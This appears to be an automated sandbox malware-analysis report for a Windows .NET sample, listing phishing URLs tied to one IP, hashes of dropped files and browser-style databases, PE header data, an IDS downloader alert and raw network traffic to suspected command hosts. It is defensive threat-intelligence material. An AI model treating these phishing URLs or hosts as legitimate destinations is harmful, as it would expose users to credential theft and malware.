                        https://sunnatbee.github.io/instagram.com/Get hashmaliciousHTMLPhisherBrowse
                        • 62.173.145.78
                        https://www16172.com/updateGet hashmaliciousUnknownBrowse
                        • 62.173.145.78
                        http://help-s--metmeask--io-org.webflow.io/Get hashmaliciousUnknownBrowse
                        • 62.173.145.78
                        https://pub-065c935349444a558a5e9b4dac1d6a16.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                        • 62.173.145.78
                        https://aditya-anand227.github.io/fb_login_replica/index.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 62.173.145.78
                        http://pubgmobile.homes/Get hashmaliciousUnknownBrowse
                        • 62.173.145.78
                        https://m-facebookk.com.vn/NvWpvt34CibTO5N3GyRcDA?vGet hashmaliciousHTMLPhisherBrowse
                        • 62.173.145.78
                        No context
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1338
                        Entropy (8bit):5.3406586469525745
                        Encrypted:false
                        SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzecKIE4oKNzKoZsXE4qdKqE4Kx1qE4DJE4j:MxHKlYHKh3oRAHKzectHo60H8HKx1qH1
                        MD5:50DC251CABD311F53342E0B618D1E70B
                        SHA1:4FA5983202E63C4D169712B21DE3963BA7F0E3EE
                        SHA-256:6CEFB5DF8EFEBE9C1DC57D8F5BD3455839E05FA5E8A30D35FFA455D4F0263276
                        SHA-512:3722C0EACA565AD70EC48801F628174C8E7D92E600ACC744BB2E4C3A52DB1AD378ED177C79234AD210C4CA836C21CC257B5A510EBEEAEF5C0ED1A1B1C5B3073D
                        Malicious:false
                        Reputation:low
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen
                        Process:C:\Users\user\Desktop\x7myVfh5YS.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):42
                        Entropy (8bit):4.0050635535766075
                        Encrypted:false
                        SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                        MD5:84CFDB4B995B1DBF543B26B86C863ADC
                        SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                        SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                        SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):155648
                        Entropy (8bit):0.5407252242845243
                        Encrypted:false
                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                        MD5:7B955D976803304F2C0505431A0CF1CF
                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                        Malicious:false
                        Reputation:high, very likely benign file
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.136413900497188
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                        MD5:429F49156428FD53EB06FC82088FD324
                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.8439810553697228
                        Encrypted:false
                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.6732424250451717
                        Encrypted:false
                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):159744
                        Entropy (8bit):0.5394293526345721
                        Encrypted:false
                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):51200
                        Entropy (8bit):0.8746135976761988
                        Encrypted:false
                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                        Category:dropped
                        Size (bytes):196608
                        Entropy (8bit):1.121297215059106
                        Encrypted:false
                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                        MD5:D87270D0039ED3A5A72E7082EA71E305
                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):155648
                        Entropy (8bit):0.5407252242845243
                        Encrypted:false
                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                        MD5:7B955D976803304F2C0505431A0CF1CF
                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                        Malicious:false
                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.136413900497188
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                        MD5:429F49156428FD53EB06FC82088FD324
                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):159744
                        Entropy (8bit):0.5394293526345721
                        Encrypted:false
                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):811520
                        Entropy (8bit):7.114369265498148
                        Encrypted:false
                        SSDEEP:12288:4/jkbU3p9FZVc+Vt6Ftd6IEZI0FzhM3XufNmOubrmTKBJcFmnp7tHSv0aSUTGLHV:44bk9FZQF36IE/FMj
                        MD5:47DA4EB71A23802DAB374E272EAD2F78
                        SHA1:ED5F82D1073BA6412134549A14F88030ECF6F627
                        SHA-256:79041E3089190C3D8DBCA92540BD2ED3B83A68791FD3876FA4DBAF4B63B7E3C3
                        SHA-512:2DA0C9717CF5D0DDF5A5097F31EFD7B1C0E94C393C160C8DA331F836EBB00915FFE22B44E5E239DAA4DC435A36AA62AD719253AE8F6796B5E47A2CA18E2015D9
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 24%
                        • Antivirus: Virustotal, Detection: 42%
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                        Category:dropped
                        Size (bytes):196608
                        Entropy (8bit):1.121297215059106
                        Encrypted:false
                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                        MD5:D87270D0039ED3A5A72E7082EA71E305
                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):5242880
                        Entropy (8bit):0.03859996294213402
                        Encrypted:false
                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):98304
                        Entropy (8bit):0.08235737944063153
                        Encrypted:false
                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.8439810553697228
                        Encrypted:false
                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                        Malicious:false
                        Process:C:\Users\user\Desktop\x7myVfh5YS.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):511488
                        Entropy (8bit):7.7008462080837425
                        Encrypted:false
                        SSDEEP:12288:f4BX0lFb66iGzQqHIEsJq9Rkw5Bu9Ywn/isxg:gBkHdhUqoEsofkM0YYS
                        MD5:BE6EEC47548380D87F6890501157B8F9
                        SHA1:D112EB4E7064BFD2E74C60092632DD5C519995E0
                        SHA-256:81264C1040C4BF15327D8145CA78C15889B8008DE553D2EA82926DB720F78462
                        SHA-512:5CB019F821AE2625CB7207286D6949BB830C24DB52FFD39936A63E097D78245068134C24DCCF0BB443BD84A08FC531C129EDD77FB9192AB0C5CC06F4EC793872
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 47%
                        • Antivirus: Virustotal, Detection: 61%
                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.606720780539441
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:x7myVfh5YS.exe
                        File size:1'403'392 bytes
                        MD5:1de4c3cc42232c1e3d7c09404f57b450
                        SHA1:28adaa72fe927ade1b3e073de288e1b6f294d346
                        SHA256:131e2baac32f898ab2d7da10d8c79f546977bc1d1d585ba687387101610ed3b9
                        SHA512:580aae865d815236e1030b173b67dc7002c70cb82caf00953999174833ce22512a4276cae4357b81e0c44e83dbf22eee9713c1138db0887e6f83d72495255671
                        SSDEEP:24576:lEr/LERGBci2VYs1xSiWepMCpmh8Qa4sJ/50iU2:CWUciCtxSiyCph44y2
                        TLSH:575539DC765036DFC86BD4729AA81CA8EB6138BB530B5207906729EDDE4C897DF140F2
                        Icon Hash:82878c91818181be
                        Entrypoint:0x55411e
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows cui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66AF54E0 [Sun Aug 4 10:16:00 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1540d0 | 0x4b | .text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x156000 | 0x4302 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x15c000 | 0xc | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x2000 | 0x152124 | 0x152200 | 3c96edaba53ea7f333d0d50baf1927f7 | False | 0.8238988851663586 | data | 7.61458092589058 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc | 0x156000 | 0x4302 | 0x4400 | 41685e5d033a1c3b4e14d2b3124aaa37 | False | 0.39148667279411764 | data | 5.019576294387208 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0x15c000 | 0xc | 0x200 | f1490972bad1aa679b24ff83395cf47c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_ICON | 0x1561a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.39273858921161825
                        RT_ICON | 0x158748 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.3972795497185741
                        RT_ICON | 0x1597f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.4929078014184397
                        RT_GROUP_ICON | 0x159c58 | 0x30 | data | | | 0.8541666666666666
                        RT_VERSION | 0x159c88 | 0x490 | data | | | 0.4049657534246575
                        RT_MANIFEST | 0x15a118 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                        DLL | Import
                        mscoree.dll | _CorExeMain
                        Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                        2024-08-05T05:54:16.947098+0200 | TCP | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 49708 | 443 | 192.168.2.5 | 62.173.145.78
                        2024-08-05T05:54:15.646834+0200 | TCP | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 49706 | 80 | 192.168.2.5 | 62.173.145.78
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Aug 5, 2024 05:54:03.359955072 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.359966993 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.359977961 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.359991074 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360054016 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.360173941 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360193968 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360220909 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.360486031 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360503912 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360515118 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360543013 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.360596895 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.360678911 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360691071 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360732079 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.361330986 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.361342907 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.361399889 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.478157043 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478188038 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478204966 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478249073 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478260994 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478271961 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478415012 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.478513002 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478555918 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478566885 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478615046 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.478627920 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478638887 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478648901 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478672028 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.478705883 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.480012894 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480072021 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480089903 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480102062 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480113029 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480115891 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.480127096 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480143070 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.480176926 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.595602989 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595619917 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595634937 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595664024 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595674992 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595686913 CEST770249704188.130.138.23192.168.2.5
